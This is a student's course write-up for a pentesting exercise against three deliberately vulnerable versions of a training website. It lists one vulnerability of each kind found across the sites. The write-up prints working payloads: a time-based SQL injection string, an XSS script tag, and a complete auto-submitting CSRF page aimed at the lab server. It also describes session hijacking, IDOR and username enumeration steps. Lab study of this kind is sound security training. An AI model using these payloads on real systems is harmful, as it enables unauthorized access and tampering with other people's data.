joshua-kim/CodePath-Week-8

Project 8 - Pentesting Live Targets

Time spent: 2 hours spent in total

Objective: Identify vulnerabilities in three different versions of the Globitek website: blue, green, and red.

The six possible exploits are:

• Username Enumeration
• Insecure Direct Object Reference (IDOR)
• SQL Injection (SQLi)
• Cross-Site Scripting (XSS)
• Cross-Site Request Forgery (CSRF)
• Session Hijacking/Fixation

Each version of the site has been given two of the six vulnerabilities. (In other words, all six of the exploits should be assignable to one of the sites.)

Blue

Vulnerability #1: SQL Injection (SQLi)

• Insert SQL into the id field. I put in ' OR SLEEP(5)=0--' to make the database stall for 5 seconds.

Vulnerability #2: Session Hijacking/Fixation

• Use the php script to get the session ID, then copy it into another browser window's php script to change the session ID to the first session ID.

Green

Vulnerability #1: Username Enumeration

• the field for span is failure if the username is correct, but failed if the username doesn't exist, allowing the attacker to identify if a username exists in the database or not.

Vulnerability #2: Cross-Site Scripting (XSS)

• Insert <script>alert(‘Josh found the XSS!');</script> in the feedback form, they get hit by it when they open their admin feedback page.

Red

Vulnerability #1: Cross-Site Request Forgery (CSRF)

• Insert http://jushkem.github.io/assets/js/feedback.html in the feedback form, when they click it the form is changed.

• The HTML file that I used was:

` <title>Your Feedback</title> <script src="https://code.jquery.com/jquery-3.2.1.min.js"></script>

    <p>rip</p>
    <style>
    .hide-form {
        display: none;
    }
    </style>
    <form action="https://35.225.89.208/red/public/staff/salespeople/edit.php?id=7" method="POST" class="hide-form" id="attackform"  name="form">
        <input type="text" name="first_name" value="Aaron" /><br />
        <input type="text" name="last_name" value="Bloomfield" /><br />
        <input type="text" name="phone" value="111-222-3333" /><br />
        <input type="text" name="email" value="fakeemail@mail.com" /><br />
    </form>
    <script>
    $(function() {
        console.log("loaded");
        window.document.forms[0].submit(function(e) {
            console.log("submitted");
        });
    });
    </script>

`

Vulnerability #2: Insecure Direct Object Reference (IDOR)

• Changed the id field in https://35.225.89.208/green/public/staff/salespeople/show.php?id=10. If you enumerate it past 9, you get salespeople that should not be public.

Notes

Describe any challenges encountered while doing the work